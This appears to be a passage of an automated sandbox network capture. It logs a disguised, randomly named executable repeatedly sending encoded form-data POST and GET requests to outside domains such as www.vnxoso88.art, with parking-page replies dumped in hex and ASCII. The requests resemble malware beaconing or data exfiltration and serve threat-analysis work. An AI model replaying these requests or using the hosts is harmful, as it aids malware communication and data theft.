                                                                                                                                                  Nov 14, 2024 15:40:15.134362936 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWI3OTI1NWUtNDdmZi00NzIyLWJlNmItMTU4YTRlZjczMTZjIiwicGFnZV90aW1lIjoxNzMxNTk1Mj


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  8192.168.2.549986199.59.243.227804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:17.088653088 CET390OUTGET /ym43/?W638b4U=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRTsdeZatTq9P8nD3DJaYsKbhsyMI+cP4BIi4vfpBrFLN6oA==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:40:17.707554102 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:16 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1518
                                                                                                                                                  x-request-id: 80f4ccc1-0ec1-469b-a4ea-b95c5083a771
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hWSW/6myXdAG/dDIsV50Lsy88i4smYJL1sTsm8rM+OGq0dyjg4+2vcZGTg+243wkPTg6NkypZhQn9T0cRTp3Dg==
                                                                                                                                                  set-cookie: parking_session=80f4ccc1-0ec1-469b-a4ea-b95c5083a771; expires=Thu, 14 Nov 2024 14:55:17 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 57 53 57 2f 36 6d 79 58 64 41 47 2f 64 44 49 73 56 35 30 4c 73 79 38 38 69 34 73 6d 59 4a 4c 31 73 54 73 6d 38 72 4d 2b 4f 47 71 30 64 79 6a 67 34 2b 32 76 63 5a 47 54 67 2b 32 34 33 77 6b 50 54 67 36 4e 6b 79 70 5a 68 51 6e 39 54 30 63 52 54 70 33 44 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hWSW/6myXdAG/dDIsV50Lsy88i4smYJL1sTsm8rM+OGq0dyjg4+2vcZGTg+243wkPTg6NkypZhQn9T0cRTp3Dg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                  Nov 14, 2024 15:40:17.707871914 CET971INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODBmNGNjYzEtMGVjMS00NjliLWE0ZWEtYjk1YzUwODNhNzcxIiwicGFnZV90aW1lIjoxNzMxNTk1Mj


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  9192.168.2.549987199.59.243.227804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:23.102281094 CET636OUTPOST /d26j/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.vnxoso88.art
                                                                                                                                                  Origin: http://www.vnxoso88.art
                                                                                                                                                  Referer: http://www.vnxoso88.art/d26j/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 47 53 2b 78 4f 46 4f 56 32 44 64 46 58 6c 41 39 30 6a 73 69 55 54 4e 56 55 6a 62 57 77 36 6c 33 42 66 55 50 4d 75 54 56 66 62 6d 77 48 58 59 2f 32 62 71 45 5a 68 59 56 4b 2f 4e 47 6f 51 34 68 4a 6b 64 79 39 64 74 6b 32 57 31 32 4d 78 5a 32 49 33 39 4f 2f 37 45 70 4e 6a 68 63 57 68 52 55 59 70 68 6d 58 5a 52 33 45 68 64 73 45 6e 72 6d 63 6e 55 55 61 38 6b 6a 67 76 71 50 73 52 74 4f 62 52 61 53 39 72 42 48 36 55 37 77 6c 68 45 54 74 57 71 4c 32 64 68 61 55 6b 7a 4e 4e 62 77 55 65 37 30 5a 48 5a 63 54 39 53 57 72 31 78 4e 34 6a 54 33 4f 39 75 2b 39 6f 54 45 3d
                                                                                                                                                  Data Ascii: W638b4U=/R1zs/iKmff+GS+xOFOV2DdFXlA90jsiUTNVUjbWw6l3BfUPMuTVfbmwHXY/2bqEZhYVK/NGoQ4hJkdy9dtk2W12MxZ2I39O/7EpNjhcWhRUYphmXZR3EhdsEnrmcnUUa8kjgvqPsRtObRaS9rBH6U7wlhETtWqL2dhaUkzNNbwUe70ZHZcT9SWr1xN4jT3O9u+9oTE=
                                                                                                                                                  Nov 14, 2024 15:40:24.058964014 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:23 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1118
                                                                                                                                                  x-request-id: 8e83974e-b816-4a62-bf5d-bbf3ad283854
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==
                                                                                                                                                  set-cookie: parking_session=8e83974e-b816-4a62-bf5d-bbf3ad283854; expires=Thu, 14 Nov 2024 14:55:23 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 77 36 4a 66 6f 4e 4d 5a 55 43 6d 42 41 61 57 4f 33 59 51 62 39 58 66 33 72 75 6b 45 32 2b 56 70 56 72 41 4e 6c 39 30 47 38 41 47 77 2f 78 4c 55 4f 58 52 4e 61 4b 4f 39 63 77 65 6b 36 6b 70 6c 77 4d 4a 35 74 4b 74 72 54 77 4b 73 2b 70 31 71 51 47 42 72 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                  Nov 14, 2024 15:40:24.058990002 CET571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGU4Mzk3NGUtYjgxNi00YTYyLWJmNWQtYmJmM2FkMjgzODU0IiwicGFnZV90aW1lIjoxNzMxNTk1Mj


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  10192.168.2.549988199.59.243.227804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:25.811752081 CET656OUTPOST /d26j/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.vnxoso88.art
                                                                                                                                                  Origin: http://www.vnxoso88.art
                                                                                                                                                  Referer: http://www.vnxoso88.art/d26j/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 52 33 42 36 77 50 4e 76 54 56 65 62 6d 77 4d 33 5a 31 79 62 71 4e 5a 68 55 6e 4b 39 5a 47 6f 51 73 68 4a 6d 31 79 39 75 56 6e 30 47 31 77 5a 42 5a 30 56 6e 39 4f 2f 37 45 70 4e 6a 45 35 57 68 5a 55 62 5a 78 6d 52 49 52 32 59 52 64 76 54 58 72 6d 59 6e 55 51 61 38 6b 56 67 75 32 70 73 53 5a 4f 62 56 65 53 39 2b 31 41 30 55 37 32 34 78 46 79 6f 7a 54 63 33 73 39 6a 49 48 79 34 53 39 6f 56 66 4e 46 7a 64 37 55 37 75 79 36 54 6c 69 46 50 79 6a 57 6e 6e 4e 75 4e 32 45 51 58 37 6a 46 6d 68 51 69 43 69 59 57 4d 55 7a 33 68 7a 38 41 77
                                                                                                                                                  Data Ascii: W638b4U=/R1zs/iKmff+Hx2xIkOVjTdCSlA9+DsmUTRVUivGxJR3B6wPNvTVebmwM3Z1ybqNZhUnK9ZGoQshJm1y9uVn0G1wZBZ0Vn9O/7EpNjE5WhZUbZxmRIR2YRdvTXrmYnUQa8kVgu2psSZObVeS9+1A0U724xFyozTc3s9jIHy4S9oVfNFzd7U7uy6TliFPyjWnnNuN2EQX7jFmhQiCiYWMUz3hz8Aw
                                                                                                                                                  Nov 14, 2024 15:40:26.467685938 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:26 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1118
                                                                                                                                                  x-request-id: 91c41352-1e5d-479e-9443-bf752271e6b6
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==
                                                                                                                                                  set-cookie: parking_session=91c41352-1e5d-479e-9443-bf752271e6b6; expires=Thu, 14 Nov 2024 14:55:26 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 77 36 4a 66 6f 4e 4d 5a 55 43 6d 42 41 61 57 4f 33 59 51 62 39 58 66 33 72 75 6b 45 32 2b 56 70 56 72 41 4e 6c 39 30 47 38 41 47 77 2f 78 4c 55 4f 58 52 4e 61 4b 4f 39 63 77 65 6b 36 6b 70 6c 77 4d 4a 35 74 4b 74 72 54 77 4b 73 2b 70 31 71 51 47 42 72 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                  Nov 14, 2024 15:40:26.467741966 CET571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTFjNDEzNTItMWU1ZC00NzllLTk0NDMtYmY3NTIyNzFlNmI2IiwicGFnZV90aW1lIjoxNzMxNTk1Mj


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  11192.168.2.549989199.59.243.227804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:28.362704992 CET1673OUTPOST /d26j/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.vnxoso88.art
                                                                                                                                                  Origin: http://www.vnxoso88.art
                                                                                                                                                  Referer: http://www.vnxoso88.art/d26j/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 4a 33 42 49 34 50 4d 4d 37 56 45 62 6d 77 46 58 5a 30 79 62 72 66 5a 68 64 75 4b 39 56 57 6f 56 6f 68 49 48 56 79 31 2f 56 6e 2b 47 31 77 62 42 5a 35 49 33 38 4d 2f 37 55 31 4e 6a 55 35 57 68 5a 55 62 62 35 6d 48 70 52 32 4c 42 64 73 45 6e 72 71 63 6e 55 38 61 38 38 46 67 75 79 6d 73 42 42 4f 62 31 4f 53 2f 4d 74 41 38 55 37 30 37 78 46 51 6f 7a 57 62 33 73 67 61 49 45 75 57 53 36 45 56 66 72 55 46 45 35 6b 74 34 41 75 4b 6f 6c 4e 74 72 31 48 4b 67 4f 57 44 38 6d 41 76 35 52 46 4d 72 47 61 77 67 62 54 61 4b 6d 7a 48 32 4d 39 75 76 66 30 35 36 42 53 35 34 77 72 69 65 69 53 56 48 7a 72 44 2b 7a 6d 45 66 37 61 43 6f 6e 57 46 30 49 6b 54 67 59 41 75 4d 45 52 35 30 68 65 53 54 55 44 4d 47 68 75 56 79 33 4e 77 49 6a 30 36 78 2b 67 4a 67 41 54 36 56 32 76 79 71 69 6b 44 55 7a 68 65 58 39 50 57 75 5a 44 74 74 71 49 5a 48 38 67 56 7a 45 51 57 33 67 49 4f 6a 70 [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=/R1zs/iKmff+Hx2xIkOVjTdCSlA9+DsmUTRVUivGxJJ3BI4PMM7VEbmwFXZ0ybrfZhduK9VWoVohIHVy1/Vn+G1wbBZ5I38M/7U1NjU5WhZUbb5mHpR2LBdsEnrqcnU8a88FguymsBBOb1OS/MtA8U707xFQozWb3sgaIEuWS6EVfrUFE5kt4AuKolNtr1HKgOWD8mAv5RFMrGawgbTaKmzH2M9uvf056BS54wrieiSVHzrD+zmEf7aConWF0IkTgYAuMER50heSTUDMGhuVy3NwIj06x+gJgAT6V2vyqikDUzheX9PWuZDttqIZH8gVzEQW3gIOjpG5BSm+T/2up97WJtIRBMN4gWnu93PsaeOCjmBBPF1OZFqRSF881VxCH9RwOXJotPk0i4xu33NvG5VUJHh/Lg1O+q7pAxUe+EuuN9u3KoNOqsR5KmVaBePgvboYvk9U2zbLS6ZN8l4Qf3j0wmncgyIB/PNXdA1YK/+OggE+m0F7L8k0tzZvnQjG9rjGWEGgRb+Hx8dEHiQvFZEMcJuh5Ft1sW+dDvn7d3o/lN3OstpxLgAwpYMKHk2yeHSRATRa4x0n2bddPe9IFGSBLVx+4c6BYSFe8sm0luz/f1JePEDkBBrMWNv8oaxwELcH8kjHrG/+edPPyizylMOthA3evOdkyYufMLClQJv5JZhf8jC7BpRTQiio6UNqZM2C0gTWa0xBQ/Mlb9CAAQY3XZEam9s+5wDdOT6aRc8mSMutm9dmpMCVGpjYVosK+qPW6W8rO98rMJNMBCcW8JXrjFCeHPvrkNYF3gw1mxPWZr/bh/09pamIQQjAqvYGCyxsk5pGLF6BySVfxSDTbpbHZRX+wFEiybbiw0xKmDmV2JL7OrYucMOj7KJJezIBPtOkzWZ5nGz+OfsovKuLs6tkbo8C8xfYS2JNiIXvWD2AP9pnELHJxogFJh4qN1uMP8UUdB5cgWCo0dPQCrZNJ76xySz7DFvMtiErW+mJ6ayG [TRUNCATED]
                                                                                                                                                  Nov 14, 2024 15:40:28.977226973 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:27 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1118
                                                                                                                                                  x-request-id: f1d3f218-e422-41ec-9b03-65b0b2db5281
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==
                                                                                                                                                  set-cookie: parking_session=f1d3f218-e422-41ec-9b03-65b0b2db5281; expires=Thu, 14 Nov 2024 14:55:28 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 77 36 4a 66 6f 4e 4d 5a 55 43 6d 42 41 61 57 4f 33 59 51 62 39 58 66 33 72 75 6b 45 32 2b 56 70 56 72 41 4e 6c 39 30 47 38 41 47 77 2f 78 4c 55 4f 58 52 4e 61 4b 4f 39 63 77 65 6b 36 6b 70 6c 77 4d 4a 35 74 4b 74 72 54 77 4b 73 2b 70 31 71 51 47 42 72 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                  Nov 14, 2024 15:40:28.977330923 CET571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjFkM2YyMTgtZTQyMi00MWVjLTliMDMtNjViMGIyZGI1MjgxIiwicGFnZV90aW1lIjoxNzMxNTk1Mj


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  12192.168.2.549991199.59.243.227804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
